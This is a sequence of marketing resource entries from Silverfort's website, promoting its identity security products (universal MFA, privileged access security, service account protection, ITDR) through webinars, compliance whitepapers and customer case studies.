Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/universal-multi-factor-authentication-mfa-with-silverfort/ Enhance Your Security with Universal MFA In today's evolving threat landscape, securing all access points is crucial. Silverfort's Universal Multi-Factor Authentication (MFA) extends robust protection across your entire enterprise, including resources previously deemed unprotectable. By integrating seamlessly with your existing infrastructure, Silverfort enables MFA enforcement without requiring modifications to individual systems. Download the solution brief to discover: How to implement MFA across all resources, including legacy systems, homegrown applications, and IT infrastructure. Strategies to enhance security posture by unifying MFA policies across on-premises and cloud environments. Ways to integrate or replace your current MFA solution for broader coverage and simplified maintenance. Strengthen your organization's defense against identity-based attacks. Download the solution brief now to learn more. --- - Published: 2025-01-14 - Modified: 2025-02-21 - URL: https://www.silverfort.com/resources/ciso-perspective-why-great-companies-with-great-solutions-still-get-breached/ In today’s constantly shifting threat landscape, even the most well-prepared companies with the latest and greatest solutions can still fall victim to breaches. But why does this happen? In this webinar, Silverfort’s CISO, John Paul Cunningham, shares his wisdom as to why even great organizations can be exposed and what can be done to strengthen your defenses. John Paul provides actionable insights and strategies for safeguarding your organization against modern threats and how to align these efforts with business goals. Other topics covered, include: Key cyber security priorities and how to collaborate with your organization’s leadership team to execute them Common vulnerabilities that are often missed, even with advanced solutions How attackers bypass traditional security measures Tactics for addressing hidden risks and blind spots in your security architecture And more --- - Published: 2025-01-09 - Modified: 2025-08-18 - URL: https://www.silverfort.com/resources/enhancing-microsofts-ability-to-protect-leaked-credentials-with-silverfort/ Compromised credentials are still the #1 way attackers break in. What if you could block their use—on every system, in real time? That’s exactly what Silverfort and Microsoft Entra ID make possible. This PDF explains how Silverfort enhances Microsoft’s leaked credential detection by enforcing immediate, context-aware Conditional Access policies—even for systems and authentications outside Entra ID. When Entra ID flags a credential leak, Silverfort can instantly block or challenge suspicious activity not just in the cloud, but across on-prem servers, legacy applications, and command-line interfaces—stopping lateral movement before it starts. By uniting Microsoft’s detection with Silverfort’s enforcement, organizations gain real-time protection where they need it most—across the full hybrid environment. In this PDF, you’ll learn how to: Enforce MFA or block access for users with leaked credentials—across on-prem and cloud environments. Prevent lateral movement attacks by cutting off compromised accounts from reaching sensitive systems. Extend Conditional Access to systems like RDP, SSH, legacy apps, and infrastructure that Entra ID alone can’t protect. Download the PDF now and learn how to shut down leaked credential attacks—no matter where they start. --- - Published: 2024-12-16 - Modified: 2025-02-21 - URL: https://www.silverfort.com/resources/preventing-privilege-escalation-effective-pas-practices-for-todays-threat-landscape/ As privileged accounts continue to be one of the highest-risk targets for cyberattacks, managing them effectively is more critical than ever. But as you know, this is much easier said than done. Traditional PAM solutions are subject to inherent blind spots that prevent them from providing end-to end security to all privileged users. Additionally, these solutions often struggle with lengthy and complex deployment cycles, reliance on manual account discovery, inability to enforce least privilege access and lack the capability to prevent admins from bypassing controls, leaving critical security gaps in place. In this webinar, Ron Rasin, Chief Strategy Officer at Silverfort, dives into the fundamentals of privileged access security (PAS), exploring key strategies for discovering, classifying, and securing privileged accounts across various organizational tiers. Topics covered, include: How to gain complete visibility into all your privileged which empowers you reduce to reducing the attack surface How to monitor all privileged user’s activity and permissions and How to implement and enforce least privilege and Just-in-Time (JIT) polices How to align PAS best practices with your organizational needs And more --- - Published: 2024-12-09 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/privileged-access-security-pas/ Discover, classify, and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users. With Silverfort's Privileged Access Security, you can: Automatically discover and classify all privileged accounts to different tiers based on the actual privileges they use. Enforce seamless Just-In-Time access on domain privileged accounts with a single click. Apply least privilege policies with virtual fencing. Eliminate your dependency on vaulting and password rotation. Get the solution brief to learn more. --- - Published: 2024-11-25 - Modified: 2025-02-21 - URL: https://www.silverfort.com/resources/beyond-the-endpoint-a-deep-dive-into-using-identity-as-the-basis-for-incident-response/ Three-quarters of organizations face faster-moving cyber threats than ever, making rapid detection and response essential. Traditionally, response focused on endpoints, but with attackers increasingly leveraging legitimate credentials, a compromised endpoint is no longer the main concern. Misuse of credentials now drives lateral movement and data exfiltration, positioning identity as a critical indicator of compromise and a key to stopping attacks. In this webinar, we take a deeper look into identity’s use in cyberattacks and explore a number of related topics, including: The reliability of using the endpoint to detect attacks Why monitoring identity augments your layered security strategy Identity’s role in post-compromise stage A look at the impact of shifting to using identity as the basis for IR efforts And more In addition, our Silverfort experts demonstrate how identity can address lateral movement attacks, particularly in ransomware scenarios requiring domain dominance. This session includes a live demo on identity-based IR, featuring containment, investigation, attack path tracing, and controlled recovery. --- - Published: 2024-11-11 - Modified: 2025-02-21 - URL: https://www.silverfort.com/resources/comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr/ The New York State Department of Health (DOH)'s Title 10 NYCRR Section 405. 46 requires healthcare facilities to implement strict cybersecurity measures, including data encryption, controlled access, and continuous electronic health records (EHR) monitoring. This ensures that hospitals maintain rigorous standards for protecting sensitive patient data, reinforcing both patient privacy and healthcare system resilience against cyber threats. Key components of Section 405. 46 include: A robust cybersecurity program The appointment of a Chief Information Security Officer (CISO) Regular Testing and Vulnerability Assessments Audit Trails and Records A detailed incident response plan Access control measures Download this solution brief to discover how Silverfort makes compliance with Section 405. 46 easy. --- - Published: 2024-11-05 - Modified: 2025-02-21 - URL: https://www.silverfort.com/resources/how-to-comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr-with-silverfort/ The New York State Department of Health (DOH) established 10 NYCRR 405. 46 in 1999, initially to safeguard patient rights regarding restraints and seclusion in hospitals. Since then, it has evolved to address growing cybersecurity concerns in healthcare. The current version mandates that healthcare facilities implement strict cybersecurity protocols, such as data encryption, controlled access, and continuous electronic health record (EHR) monitoring. These updates aim to protect patient privacy and secure the healthcare system against cyber threats. In October 2024, the DOH introduced further updates to 10 NYCRR 405. 46, strengthening the regulation's cybersecurity mandates across New York’s 195 general hospitals. These new rules require hospitals to fully comply by October 2025, though they must report cybersecurity incidents within 72 hours as of October 2024. The regulation is focused on protecting sensitive patient health information (PHI) and personally identifiable information (PII) from cyber threats. Key elements of the updated mandate include: Cybersecurity Program: A robust program covering monitoring, incident response, training, and policies is now required. Chief Information Security Officer (CISO): Each hospital must designate a CISO, either as an internal role or through a third party, to oversee cybersecurity. Access Control Measures: Hospitals must enforce multifactor authentication (MFA), manage privileged account access, and conduct annual access reviews. Testing and Vulnerability Assessments: Regular testing, including scans and penetration assessments, is required to manage cybersecurity risks. Audit Trails and Records: Hospitals must maintain audit trails to detect and respond to cyber incidents and securely retain records. Incident Response: A detailed response plan is mandatory, with incident reporting to the Department of Health within 72 hours. Silverfort, a unified identity security platform, assists hospitals with these new requirements through cost-effective, healthcare-focused solutions. By offering tools for MFA, privileged access security, and continuous threat monitoring, Silverfort helps hospitals comply with reporting and identity security standards efficiently. Download the full whitepaper to discover: In-depth Compliance Insights: Detailed guidance on meeting each specific requirement of New York's 10 NYCRR 405. 46. Practical Solutions for Implementation: Learn how Silverfort's platform simplifies MFA and access security, customized for healthcare needs. Future-Ready Security Strategies: Gain insights into how to adapt identity security practices to safeguard against evolving cyber threats. --- - Published: 2024-10-16 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/how-to-comply-with-cmmcs-identity-security-requirements-with-silverfort/ The Cybersecurity Maturity Model Certification (CMMC) was established by the U. S. Department of Defense to bolster security in the Defense Industrial Base (DIB) sector by protecting sensitive unclassified data. CMMC compliance is mandatory for all organizations involved with the DoD, ensuring they meet various levels of security requirements based on their role and the sensitivity of the data they handle. Achieving CMMC certification is crucial for DIB entities to protect critical systems and demonstrate their commitment to cybersecurity. With an emphasis on identity security, CMMC requires robust authentication measures, including Multi-Factor Authentication (MFA), to safeguard sensitive data. It also mandates strict access controls, enforcing the principle of least privilege to restrict access based on necessity. Organizations are expected to continuously monitor, log, and audit user activities to proactively detect and respond to potential threats. Silverfort enables DIB organizations to meet these requirements quickly and easily. By integrating seamlessly with existing Identity and Access Management (IAM) systems, Silverfort offers comprehensive tools such as advanced MFA, Identity Security Posture Management (ISPM), and Identity Threat Detection and Response (ITDR). Silverfort extends MFA capabilities to legacy systems and unprotected resources, implements strong access controls, and continuously monitors access requests to detect and prevent unauthorized access in real time. Download our full whitepaper to explore how Silverfort supports your journey to CMMC compliance. --- - Published: 2024-10-14 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-token2-integration/ FIDO2 tokens are a powerful defense—but what if you could use them to protect everything? This PDF explores how Silverfort and Token2 join forces to bring adaptive, hardware-backed MFA to every access point in your hybrid environment—no exceptions. Whether it's legacy applications, PowerShell tools, file shares, or desktop logins, the Silverfort + Token2 integration enables you to apply Token2’s Pin+ Series FIDO2 tokens everywhere, without modifying apps or deploying agents. Silverfort performs real-time access risk analysis across on-prem and cloud resources. When suspicious activity is detected, it triggers a Token2 MFA challenge, ensuring the right people get access—and attackers don’t. The result? Stronger Zero Trust, seamless authentication, and no more unnecessary MFA prompts. In this PDF, you’ll learn how to: Extend Token2 FIDO2 MFA to legacy, cloud, and on-prem systems that previously couldn’t be protected. Enforce adaptive MFA based on contextual risk to reduce friction and boost security. Unify the user experience with a consistent, risk-aware MFA process across your entire environment. Download the PDF now to discover how Silverfort and Token2 make secure, risk-based, hardware-backed authentication a reality for every system in your enterprise. --- - Published: 2024-10-08 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/silverfort-identity-security-for-nist-sp-800-171/ NIST Special Publication 800-171, published in 2015 by the National Institute of Standards and Technology (NIST), offers a comprehensive framework for safeguarding Controlled Unclassified Information (CUI) in non-federal systems. It primarily targets federal contractors, subcontractors, and other non-federal organizations that store or process CUI on behalf of the U. S. government. CUI encompasses sensitive but unclassified information in areas such as defense and healthcare, and protecting it is crucial for national security. NIST SP 800-171 highlights identity security as a critical component in protecting CUI, recognizing the shift in cyberattacks towards exploiting compromised credentials and weak access controls. Key requirements include implementing multi-factor authentication (MFA), conducting regular user account audits, and enforcing the principle of least privilege to limit access to sensitive data. The Silverfort Unified Identity Security Platform complements NIST SP 800-171 by enhancing identity security across all Identity and Access Management (IAM) systems within an organization. It provides tools such as advanced MFA, Identity Security Posture Management (ISPM), and Identity Threat Detection and Response (ITDR). Silverfort extends MFA to previously unprotected resources, applies strong access controls, continuously monitors for anomalies, and actively detects and blocks identity-based threats. These capabilities help organizations comply with NIST SP 800-171 by strengthening identity security and reducing the risk of unauthorized access to CUI. Download our white paper to discover the full details of how Silverfort makes complying with NIST SP 800-171 easy. --- - Published: 2024-10-04 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/from-breach-to-recovery-designing-an-identity-focused-incident-response-playbook/ Traditional incident response plans are no longer enough. Cybercriminals are relentlessly targeting identities, exploiting stolen credentials and weak access points to wreak havoc. While there's a well-trodden path for handling malware and network breaches, the identity piece of the puzzle is often missing. Organizations lack the clear procedures to quickly identify compromised accounts and stop attackers from spreading like wildfire. That's where a robust Identity Incident Response (IR) Playbook comes in. It's the essential tool for fortifying your defenses and protecting your organization's most valuable assets. In this webinar, you'll discover: Why identity is the new frontline in the cyberwar The latest tactics attackers use to compromise accounts Proven strategies for rapid detection and containment How to create an Identity IR Playbook tailored to your organization And much more! Whether you're starting from scratch or looking to level up your existing incident response, this webinar will give you the knowledge and actionable steps to safeguard your identities against today's most pressing threats. --- - Published: 2024-10-01 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/silverfort-smart-policy-for-service-accounts/ Scale service account protection in bulk with behavior-based policies that never interfere with service operations. With Silverfort's Smart Policy, customers can automatically create policies for groups of service accounts without disrupting critical services. Save the time and labor of creating policies one-by-one, monitoring for policy deviations and manually enforcing deny policies with this simple solution. Discover Silverfort's smart policies for service accounts by downloading this solution brief. --- - Published: 2024-09-25 - Modified: 2025-08-14 - URL: https://www.silverfort.com/resources/identity-has-become-the-prime-target-of-threat-actors-silverfort-aig/ As the frequency and sophistication of ransomware attacks escalate, identity has emerged as the primary target for cybercriminals. With over 83% of organizations reporting breaches involving compromised credentials, attackers are exploiting security gaps in identity and access management (IAM) strategies, especially where multi-factor authentication (MFA) is either misconfigured or not covered. Despite the critical role of MFA in bolstering security, many organizations continue to face significant challenges in achieving full MFA coverage, leaving them vulnerable to identity-based attacks. This white paper highlights the growing threat to identity, detailing the limitations of traditional MFA implementations, especially in securing on-premises and legacy systems. Attackers often exploit these gaps to gain unauthorized access, escalate privileges, and deploy ransomware. Administrative and service accounts, which typically have broad access across networks, are particularly vulnerable to compromise as they without robust MFA protection. You will learn the common challenges organizations face in implementing MFA, such as difficulties with legacy systems and the use of outdated authentication protocols. MFA should be approached from a unified, comprehensive perspective, emphasizing that any gaps in protection, especially for privileged accounts, may result in devastating security breaches. Key Findings: Identity Threats on the Rise: Over 83% of breaches involve compromised credentials, with attackers exploiting MFA misconfigurations and coverage gaps. MFA Shortcomings: Traditional MFA methods often fail to protect critical on-premises systems, service accounts, and administrative users, creating significant vulnerabilities. Unified MFA Solution: A comprehensive, protocol-agnostic MFA solution is necessary to ensure full coverage across all resources, from cloud-based applications to legacy on-premises infrastructure. To protect all user access, including privileged accounts, organizations are encouraged to reassess their MFA implementations and adopt strategies that provide full protection. Get the whitepaper today to start your journey. --- - Published: 2024-09-24 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/silverforts-okta-bridge/ Bring Okta’s web SSO flows to your on-prem world for real-time protection against identity-based attacks. Think Okta’s identity controls are just for cloud apps? Think again. With Silverfort’s Okta Bridge, you can extend Okta’s Adaptive Authentication and MFA to every part of your hybrid environment, including legacy apps, command-line tools, and on-prem servers. No custom integrations. No rip-and-replace. Just seamless, secure access control everywhere. This solution brief shows you exactly how the Silverfort-Okta integration works, what problems it solves, and how it lets you treat your on-prem systems like modern SaaS apps in Okta, complete with policy enforcement, visibility, and strong authentication. Whether you’re modernizing your IAM strategy or just want to reduce identity risk without the heavy lift, this guide gives you the roadmap. In this PDF, you’ll learn how to: Bridge legacy and modern systems by integrating on-prem apps into Okta’s web SSO flows. No rewrites required. Apply Okta policies and MFA to any resource, enabling consistent security across cloud, on-prem, and multi-cloud environments. Prevent identity threats like lateral movement attacks with inline, risk-aware access decisions. --- - Published: 2024-09-24 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/silverforts-pingfederate-bridge/ Extend PingFederate web SSO flows to every corner of your environment What if you could apply PingFederate’s robust access policies and MFA to your on-prem resources, without ripping and replacing legacy infrastructure? With Silverfort’s PingFederate Bridge, you can. This solution brief shows how Silverfort seamlessly extends PingFederate’s identity security controls to traditionally “unprotectable” resources, like legacy apps, command-line tools, and IT infrastructure. By bridging these systems into PingFederate, you unify policy enforcement, gain full visibility into authentication activity, and protect against advanced identity threats like lateral movement—without disrupting users or operations. This guide breaks it all down clearly, including how the bridging process works step-by-step, what you gain from it, and why this joint solution is a game-changer for hybrid identity security. In this PDF, you’ll learn how to: Bridge the gap between legacy on-prem systems and modern identity security with PingFederate SSO flows. Unify policy enforcement across cloud and on-prem environments, without changing the user experience. Stop advanced attacks like lateral movement with inline risk-based access decisions and PingID MFA. --- - Published: 2024-09-24 - Modified: 2025-07-01 - URL: https://www.silverfort.com/resources/meeting-the-identity-security-requirements-of-the-cjis-security-policy-with-silverfort/ CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is any information that cannot be publicly disclosed except under certain circumstances, like by court order or when necessary for public safety. In particular, it refers to Federal Bureau of Investigation (FBI) data such as biometrics, biographics, case records, and other identifiable information about individuals, vehicles, or properties related to criminal activity. Organizations that handle CJI are required to comply with the CJIS Security Policy as soon as they begin accessing, storing, or transmitting this data. Addressing the Identity Security Aspects of CJIS CJIS addresses identity security concerns by requiring strong authentication mechanisms, including multi-factor authentication (MFA), to ensure that only authorized individuals can access CJI. This proactive approach to identity security significantly reduces the risk of unauthorized access, even if one factor is compromised. Additionally, the CJIS policy mandates strict management of privileged accounts in line with the principle of least privilege and requires regular auditing and monitoring to detect any unauthorized activities. Continuous monitoring and detailed logging of user activities are also vital components of CJIS compliance. Organizations must track who accesses CJI and when, so identifying and responding to suspicious actions can occur quickly and easily. Download this whitepaper to discover: The key CJIS identity security requirements How Silverfort's capabilities map to CJIS How to comply quickly and easily with CJIS --- - Published: 2024-08-19 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ppc/ MFA protection is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. MFA protection in AD environments is only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk. Download this eBook to learn: Why traditional MFA solutions can’t protect PsExec and PowerShell access. How you can assess your existing MFA protection to better understand your risk exposure. How you can gain end-to-end MFA coverage for all NTLM and Kerberos authentication in your AD environment. --- - Published: 2024-08-19 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts-ppc/ Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers. Download this eBook to learn: Why automating the discovery of service accounts is a must-have. How learning the behavior of each service account is the first step towards real-time protection. How to prevent adversaries from using compromised service accounts for malicious access. --- - Published: 2024-08-19 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams-ppc/ Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. PAM solutions aim to address the challenge of protecting privileged accounts – both admin users and service accounts – from compromise. However, there are critical admin user discovery and protection challenges that must be overcome to successfully complete the PAM onboarding journey.  Download this eBook to learn: Why only protecting the admins you know about leaves critical users exposed to compromise. What special visibility and protection challenges service accounts introduce to PAM solutions. How a Unified Identity Security platform can accelerate the PAM journey and complement its blind spots. --- - Published: 2024-08-15 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/why-identity-security-is-a-necessity/ Identity security has become a top priority for all organizations. Traditional identity controls do not provide complete coverage, leaving critical resources exposed to malicious access and attacks that use compromised credentials, like lateral movement or ransomware. By not taking a proactive approach to identity security, you will always be one step behind malicious actors. Download this solution brief to discover the key foundations of identity security. --- - Published: 2024-08-12 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/safe-and-impact-free-usage-of-silverfort-on-your-domain-controllers/ Ensuring your Active Directory Domain Controllers are secure and stable is more critical than ever. Silverfort understands the delicate balance between enhancing security and maintaining system stability. Our solution is designed with this balance in mind, ensuring that you can bolster your security posture without compromising the performance or reliability of your domain controllers. Download this solution brief to discover how Silverfort operates seamlessly without causing any disruptions to your system. --- - Published: 2024-08-07 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/data3-and-silverfort-implementing-world-leading-identity-protection-with-the-southport-school/ Discover how Silverfort and Data#3, leading cloud solutions and ICT service providers in Australia, are working together to bring best-in-class identity protection to The Southport School. https://www. youtube. com/watch? v=zD6ewfsaf8Q --- - Published: 2024-08-07 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/why-silverfort/ Traditional identity controls fall short of providing complete coverage, leaving critical resources exposed to malicious access. With Silverfort, organizations can solve the critical identity security risks they’ve been struggling with for years – because we go where identity security has never gone before. Download this solution brief to understand what Silverfort does and why it’s an essential identity security tool. --- - Published: 2024-07-23 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/silverfort-for-microsoft-sentinel-and-security-copilot/ Traditional IAM solutions often lack the depth needed to detect ongoing malicious activity, particularly identity-based attacks. Silverfort bridges this gap by seamlessly integrating with Microsoft Sentinel, providing granular and analyzed identity-security data. This integration streamlines the investigation and response process for security analysts, enhancing their ability to quickly and accurately mitigate threats. Download this solution brief to learn more about how Silverfort for Microsoft Sentinel works.   --- - Published: 2024-07-17 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/silverfort-identity-security-for-the-nist-cybersecurity-framework-2-0/ Align with NIST 2. 0 and secure every identity with confidence The NIST Cybersecurity Framework 2. 0 is here, and it’s raising the bar on how organizations assess, manage, and reduce cybersecurity risk. At the heart of this shift? Identity. If you're looking for a smarter, simpler way to address the identity-focused controls in NIST 2. 0, this guide is your roadmap. We'll break down exactly how Silverfort helps you align with NIST’s five core functions—Govern, Identify, Protect, Detect, and Respond—through identity security. From extending MFA to previously unprotectable systems to detecting lateral movement and risky authentications in real time, this whitepaper shows how Silverfort delivers the visibility, enforcement, and automation you need to meet NIST recommendations with confidence and control. In this whitepaper, you’ll learn how to: Strengthen identity posture across your entire IAM infrastructure with continuous monitoring, risk scoring, and adaptive access control. Map directly to NIST CSF 2. 0 functions with detailed, control-by-control breakdowns—no guesswork required. Enforce zero trust principles like least privilege, MFA everywhere, and Just-In-Time access—without overhauling your existing environment. --- - Published: 2024-07-16 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/gain-end-to-end-visibility-across-your-environment-with-silverfort/ Security starts with visibility. If you don’t have full visibility across your environments, you are essentially operating in the dark. Without clear insight into user and authentication activity, access permissions, risky identities, authorized applications, and the potential identity security risks in your organization, you cannot make informed decisions. As a result, you could be leaving critical identity security gaps without even being aware of them. Download this solution brief to learn more about end-to-end visibility with Silverfort, including:  Gaining complete visibility into all user activity and authentications Investigating potential risks quickly and efficiently Powering up your identity security posture management Monitoring your service accounts --- - Published: 2024-07-12 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/webinar-top-5-evaluation-criteria-for-itdr-solutions/ In today’s digital landscape, identity threats are more prevalent than ever. Protecting your digital identity is crucial as lateral movement and ransomware attacks rise. The new category of Identity Threat Detection and Response (ITDR) has emerged to address these challenges, but selecting the right tool can be daunting. . Hear from Yiftach Keshet, VP of Product Marketing at Silverfort, in this exclusive webinar where you’ll discover: Unique Challenges Only ITDR Can Solve: Discover why traditional solutions fall short and how ITDR bridges the gap. Critical ITDR Capabilities: Learn about the key features to look for in an ITDR solution to ensure robust identity protection. Real-Life Scenarios: Gain insights into how ITDR solutions effectively counteract identity threats in various situations. Key takeaways from this webinar: Understand the importance of identity protection in cybersecurity. Learn how to evaluate and choose the best ITDR solution for your needs. Get actionable insights from real-world examples. --- - Published: 2024-07-02 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/london-borough-of-waltham-forest-and-silverfort-a-case-study/ Following ransomware attacks targeting a number of schools in the borough, the London Borough of Waltham Forest needed to strengthen its identity security posture. This meant extending MFA protection to all Active Directory users and gaining full visibility of all user authentication flows. Waltham Forest also sought a solution that could be quickly procured and deployed. In this case study you’ll learn: How Waltham Forest implemented MFA protection for all privileged admin accounts. How they gained complete visibility into user authentication flows. How they were able to quickly and easily deploy and gain value from the Silverfort solution. --- - Published: 2024-07-02 - Modified: 2024-10-15 - URL: https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface-thn-nf/ Identity threats that utilize compromised credentials to for malicious access to targeted resource have become the chief concern for organizations' security stakeholders. Neither one of the existing security products can deliver real-time protection against these attacks, making them account takeover, lateral movement and ransomware spread a critical, unaddressed risk. Identity Threat Detection and Response (ITDR) is the new category of products that was purpose built to confront and win against these attacks.  Download this eBook to learn: What makes the identity attack surface exposed to attacks? What are the core capabilities of ITDR solution? How to choose an ITDR solution that best fits your needs? --- - Published: 2024-07-01 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/silverforts-authentication-firewall/ Strengthen Access Control with Silverfort's Authentication Firewall In today's dynamic threat landscape, enforcing granular access control is essential to protect your organization's resources. Silverfort's Authentication Firewall empowers you to govern user access based on identity, enabling real-time enforcement of least privilege policies without requiring infrastructure changes. Download the solution brief to learn: How to implement dynamic access segmentation to control user interactions with critical resources effectively. Strategies for reducing your attack surface by blocking insecure protocols and addressing misconfigurations. Methods to contain active attacks by freezing access to sensitive areas upon breach detection. Enhance your security posture with proactive access control measures. Download the solution brief now to get started. --- - Published: 2024-07-01 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/leading-gaming-company-extends-mfa-protection-to-core-legacy-applications-and-bridges-on-prem-resources-to-entra-id-with-silverfort/ A leading gaming company that develops immersive free-to-play social and mobile games sought to implement MFA protection across all users and resources in its environment to meet the PCI DSS compliance framework’s requirements. They also needed a solution to improve visibility and protection of its service accounts. In this case study you’ll learn: How this leading gaming company extended MFA protection to all users and resources. How they gained full visibility and protection of all service accounts. How they complied with the PCI DSS framework’s MFA requirements quickly and easily. --- - Published: 2024-06-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-thales-fido2-integration/ FIDO2 hardware-backed authentication is the gold standard. But what if you could apply it to every system—no matter how old or complex? That’s exactly what this integration makes possible. In this quick-read PDF, you’ll discover how Silverfort and Thales combine to extend FIDO2 smart card and USB token protection to all your resources—cloud, on-prem, and even those long-considered “unprotectable. ” Silverfort analyzes every access attempt in real time, determines risk, and, if necessary, triggers a FIDO2 challenge via Thales—ensuring bulletproof MFA is applied only when it matters. It works seamlessly across environments, without requiring agents, proxies, or changes to application code. If your security strategy depends on Zero Trust or high-assurance access, this is the integration you’ve been waiting for. In this PDF, you’ll learn how to: Extend Thales FIDO2 MFA to legacy systems, command-line tools, file shares, and more. Strengthen risk-based Zero Trust access with adaptive policy enforcement that won’t disrupt users. Meet regulatory requirements with FIDO2-, FIPS-, and Common Criteria-compliant authenticators. Download the PDF now to see how Silverfort and Thales deliver enterprise-grade security—everywhere it counts. --- - Published: 2024-06-23 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/shannon-medical-center-and-silverfort-a-case-study/ As a prominent healthcare provider, Shannon Medical Center needed to increase its overall security posture. This meant applying MFA protection to its entire user base and gaining better visibility into its admin users’ activity as well as its overall IT infrastructure. Shannon Medical Center searched for an identity security solution that would meet all their security needs as well as the needs of their healthcare environment. In this case study you’ll learn: How Shannon Medical Center implemented MFA protection for all users and resources How they strengthened AD hygiene by having complete visibility into user types and their activity How they gained full visibility and protection of all service accounts --- - Published: 2024-06-03 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/identity-protection-for-financial-services-key-insights-from-the-state-of-the-identity-attack-surface/ Cyberattacks on financial institutions are highly frequent due to the large amount of sensitive financial information and assets they hold. In this eBook, we analyze data on financial services extracted from the State of the Identity Attack Surface report published by Silverfort and Osterman Research. In light of the new data, this eBook examines the different identity protection challenges that financial institutions face, including privileged accounts accessing sensitive information, a lack of visibility into service accounts, and the widespread use of legacy systems. eBook Highlights: 78% of organizations in the financial services sector reported experiencing identity-related breaches Only 2. 4% have full visibility into their service accounts 68% rely on financial legacy systems, which prevent them from implementing new identity components Only 32% have unified PAM capabilities across their on-premise and cloud environments --- - Published: 2024-06-03 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/the-role-identity-plays-in-nearly-every-attack-including-ransomware/ Watch this short video about Unified Identity Protection with Silverfort. The common misconception that identity infrastructure and IAMs like Active Directory, Okta, or Ping can adequately secure the entire identity infrastructure is to blame for the continued barrage of cyber and ransomware attacks. Yes, each of these vendors has security controls baked into their solution, however they cannot extend those controls outside their environments to provide visibility, context, and protection beyond their walls. Hackers use the gaps between these tools to move throughout a company and evade detection. Identity infrastructure remains the most unprotected part of the technology stack and needs dedicated protection, as organizations already apply for cloud, endpoints, or networks. Watch this conversation with Hed Kovetz, CEO and Co-Founder of Silverfort, as he takes us through why identity security remains the most unprotected part of the security stack, and what needs to change to advance the state of cybersecurity. In collaboration with SC Magazine. https://www. youtube. com/watch? v=1fwrtV-VZZ0 --- - Published: 2024-06-03 - Modified: 2024-09-26 - URL: https://www.silverfort.com/resources/top-identity-protection-challenges-for-manufacturing/ It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations on manufacturing companies daily. What is less commonly known is that the rise of identity threats’ part within the overall threat landscape collides with security weaknesses that are unique to this vertical, increasing manufacturers’ risk exposure and the potential damage these attacks can cause. In this resource, you’ll become familiar with the identity threats that manufacturing environments face, get to know the top challenges they face when attempting to protect against them, and learn how Silverfort’s Unified Identity Protection platform can assist identity and security teams to fully address these challenges and maintain their environments secure. --- - Published: 2024-05-30 - Modified: 2025-06-10 - URL: https://www.silverfort.com/resources/womble-bond-dickinson-and-silverfort-case-study/ Womble Bond Dickinson (UK) LLP is a transatlantic law firm that provides the breadth of legal experience and services to meet their client’s needs across the UK. When their cyber insurance firm enforced stricter MFA prerequisites for policy renewals, WBD sought a solution that would help them comply quickly and easily. In this case study you’ll learn: How Womble Bond Dickinson (UK) complied with MFA requirements How they gained full visibility of their service accounts and insights into all identity data How they achieved all this quickly and easily with Silverfort --- - Published: 2024-05-29 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/west-valley-school-district-silverfort-a-case-study/ West Valley School District Extends MFA Protection to All Faculty Users While Securing Service Accounts West Valley School District 208 strives to help all students become responsible and productive citizens, effective communicators, creative problem-solvers and life-long learners. Recognizing the ongoing risks posed by the evolving threat landscape, West Valley School District’s cyber insurance provider tightened their MFA requirements. At the same time, West Valley School District sought to limit and protect service accounts with excessive privileges within their environments. In this case study you’ll learn: How West Valley School District gained end-to-end service account protection with access policies How they renewed their cyber insurance policy by complying with new requirements quickly and easily Why they have chosen to partner with Silverfort --- - Published: 2024-05-27 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/leading-telecom-provider-and-silverfort-a-case-study/ Due to the many identity protection challenges and the awareness of their evolving threat landscape, a leading telecom provider security team sought a solution that would provide them with advanced MFA protection capabilities, complete visibility, and security into their user and authentication requests across their environments. The leading telecom provider partnered with Silverfort to gain real-time identity security and visibility into their user access and authentication requests by extending MFA coverage across all their custom legacy applications and environments. In this case study you’ll learn: How Telecom legacy applications can be protected with MFA protection How all users including third-party vendors are protected with MFA policies How to gain complete visibility and risk analysis into every user authentication and access request --- - Published: 